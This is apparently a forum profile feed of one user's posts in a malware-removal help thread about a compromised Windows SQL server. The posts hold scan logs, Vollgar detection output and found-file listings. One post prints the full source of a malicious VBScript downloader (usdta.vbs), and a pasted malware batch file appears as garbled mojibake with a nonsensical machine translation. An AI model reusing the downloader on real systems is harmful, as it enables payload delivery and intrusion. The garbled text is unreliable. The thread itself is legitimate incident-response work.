AlinTech
Honorary Members-
Posts
28 -
Joined
-
Last visited
Reputation
0 NeutralRecent Profile Visitors
The recent visitors block is disabled and is not being shown to other users.
-
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
I m the only it specialist.. The server is compromised. I backup and export the dbs and i create a new vm Thank you very much for support sir! Thank you for your time! Best regards. -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
S C:\Users\PitSoft\Downloads\labs_campaigns-master\labs_campaigns-master\Vollgar> .\detect_vollgar.ps1 Security warning Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning message. Do you want to run C:\Users\PitSoft\Downloads\labs_campaigns-master\labs_campaigns-master\Vollgar\detect_vollgar.ps1? [D] Do not run [R] Run once Suspend [?] Help (default is "D"): r Vollgar Campaign Detection Tool Written By Guardicore Labs Contact us at: labs@guardicore.com [V] Vollgar's malicious service SQLAGENT MSSQL SQLIOSIMSA was not found on this host. [V] Vollgar's local user IUER_SERVER was not found on this host. [V] No malicious payloads were found. [V] No malicious scheduled tasks were found. [V] No evidence for the Vollgar campaign has been found on this host. PS C:\Users\PitSoft\Downloads\labs_campaigns-master\labs_campaigns-master\Vollgar> -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
If you what remote control tell me and i give you. thank you for support -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
https://www.virustotal.com/gui/file/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/detection Its not true, check the community tab. And the file appear its scanned in 2020-04-11 21:29:47 UTC -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
yes, this is the content. on error resume next with wscript:if .arguments.count<2 then .quit:end if set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") web.open "get",.arguments(0),0:web.send:if web.status>200 then quit aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with ---------------------------- i found in C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1048-7B44-AC0F074E4100} this files: abcpy.ini.id-58D92ED6.[datadecrypt@qq.com].ETH setup.ini.id-58D92ED6.[datadecrypt@qq.com].ETH I found in C:\ProgramData\DataFiles\Microsoft\Fonts this files: CSCDA59.tmp, CSCEFB6.tmp, m2017.bat, m2017.exe, up.cs The content m2017.bat is: '&MZ? ? @ ? ???L?This program cannot be run in DOS mode.汣൳㨊湏䔠牲牯删獥浵敎瑸☧摣⼠┢摾ば•挦捳楲瑰ⴠ㩥扶┢晾∰栠瑴㩰⼯〲⸹㌱⸵㐱⸰㈱㨹〸〸眯睷氯确是摶൬✊挦捳楲瑰ⴠ㩥䉖捓楲瑰䔮据摯稢硸種灩•瑨灴⼺㈯㤰ㄮ㔳ㄮ〴ㄮ㤲㠺㠰⼰睷⽷湬⽸癦汤㔠㤷㘵㠲㜴☧敤稢硸種灩☢敤┢晾∰䔦楸൴挊牵敲瑮慰桴㴠挠敲瑡潥橢捥⡴匢牣灩楴杮䘮汩卥獹整佭橢捥≴⸩敇䙴汩⡥獗牣灩捓楲瑰畆汬慎敭⸩慐敲瑮潆摬牥倮瑡൨搊浩砠区瑥砠㴠挠敲瑡潥橢捥⡴档⡲㜸⬩档⡲〱⤵挫牨ㄨ〱⬩档⡲㈷⬩档⡲ㄱ⤶挫牨ㄨ㘱⬩档⡲ㄱ⤲挫牨㐨⤶挫牨㠨⤷挫牨ㄨ㔰⬩档⡲ㄱ⤰挫牨㜨⤲挫牨ㄨ㘱⬩档⡲ㄱ⤶挫牨ㄨ㈱⬩档⡲㈸⬩档⡲〱⤱挫牨ㄨ㌱⬩档⡲ㄱ⤷挫牨ㄨ⬩档⡲ㄱ⤵挫牨ㄨ㘱⬩档⡲㘴⬩档⡲㌵⬩档⡲㘴⬩档⡲㤴⤩楤㩢敓⁴‽牣慥整扯敪瑣挨牨㘨⤵挫牨ㄨ〰⬩档⡲ㄱ⤱挫牨ㄨ〰⬩档⡲㠹⬩档⡲㘴⬩档⡲㌸⬩档⡲ㄱ⤶挫牨ㄨ㐱⬩档⡲〱⤱挫牨㤨⤷挫牨ㄨ㤰⤩灏湥挠牨㜨⤱挫牨㘨⤹挫牨㠨⤴圬捓楲瑰䄮杲浵湥獴〨Ⱙ㨰敓摮眺瑩㩢琮灹‽㨱漮数㩮眮楲整砠爮獥潰獮䉥摯㩹献癡瑥景汩畣牲湥灴瑡尢硺楺≰㈬⸺汣獯㩥湥楷桴 in EN: '& MZ? ? @? ??? L? This program cannot be run in DOS mode. It ’s true that it ’s true that it ’s true that it ’s the most important thing, but it ’s the most important thing. It ’s a good thing.滟 灴 缴 ⼺ ㈰ ㄮ 㔳 ㄮ 〴 ㄮ 㤲 㠺 㠰 ⼰ 睷 ⽷ 潬 罸 晦 汤 㔠 㤷 㘵 㠲 㜴 ☧ 敤 稢 ☸ Do you want to do it? Do you want to do it? Do you want to do it? Do you want to do it? Do you know how to do it? Do you want to do it?砠 区 瑥 砠 㴠 Tang 摡 摥 戥 捥 ⡴ File ⡲ 㜸 ⬩ 文件 ⡲〱⤵ 梨 牨 ㄨ 〱 ⬩ 文件 ⡲㈷⬩ 文件 ⡲ ㄱ ⤶ 梨 牨 ㄨ 㘱 ⬨File ⡤ Frustration ℩ ⬩ file ⡲ ㄱ ⤰ Frustration 㜨 ⤲ Frustration ㄨ 㘱 ⬩ file ⡲ ㄱ ⤶ Frustration 焨 ㄨ ㈱ ⬩ file ⡲ ㈸ ⬩ file ⡲ 〱 ⤱ ㄨ ℱ ℨ ⡲ ㄱ ⤵ Frustration ㄨ 㘱 ⬩ file ⡲ 㘴 ⬩ file ⡲㌵⬩ file ⡲ 㘴 ⬩ file ⡲ 㤴 ⤩ 楤 㩢 敓 ⁴‽ It's a bit of a frown, and it's a frustration. It's a file ⡲ ㄱ ⤱ Frustration ㄨ 〰 ⬩ file ⡲ 㠹 ⬩ file ⡲ 㬴 ⬩ file ⡲ ㌸ ⬩ file ⡲ ㄱ Ⅎ ℤ牨 㤨 ⤷ 梨 牨 ㄨ 㤰 ⤩ 灏 湥 牨 眨 㜨 ⤱ 梨 牨 㘨 ⤹ 梨 牨 㠨 ⤴ 圬 捓 楲 瑮 焮 杲 浵 湥 獰 Ⱙ㨱 漮 数 㩮 眮 楲 杮 砠 獮 獝 牝 牥 䉥 sincerely dedicate to idiot 瑥 景 汩 畣 鮥 灴 瑡 尤 硺 楺 ≰㈬⸺ 汣 獯 㩥 i found in C:\ProgramData\MySQL\MySQL Server 5.5\data\mysql view in attach I dont found any vbs files. Thank you -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Sure. usdta.zip -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Thanks EventLogs.zip -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Question: Is this machine in a business-network or home-network type setting? A: Business-network Q: Is this same system serving multiple simultaneous users ? or just yourself ? A: multiple simultaneous users --------------------------------------------------------- i don't use Internet Explorer but i know viruses use it to download infected files. Thank you very much for support. mbar-log-2020-04-11 (22-05-01).txt AdwCleaner[S01].txt Search.txt -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
This is my BGP log with AiProtection - Infected Device Prevention and Blocking IntrusionPreventionSystem .csv MaliciousSitesBlocking.csv -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
-
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
in ProgramData i found this: SQLAGENTVDC.exe usdta.vbs in attach i opened with edit https://www.virustotal.com/gui/file/656c6324142ebbc7184792130f9299c6e2a0bfc451f2609ca5947d2bcc5cb288/detection New Text Document.txt -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Yes, i have enabled Audit Process Creation and Include command line in process creation events. exactly as in the documentation. -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Thank you This is eset log. esetlog.txt -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>sfc /scannow Beginning system scan. This process will take some time. Beginning verification phase of system scan. Verification 100% complete. Windows Resource Protection did not find any integrity violations. C:\WINDOWS\system32> Now, i start the full scan with eset online Thx -
Trojan:PowerShell/PsInjection.A | Threat Severe
AlinTech replied to AlinTech's topic in Resolved Malware Removal Logs
Hi, thank you sir. Fixlog.txt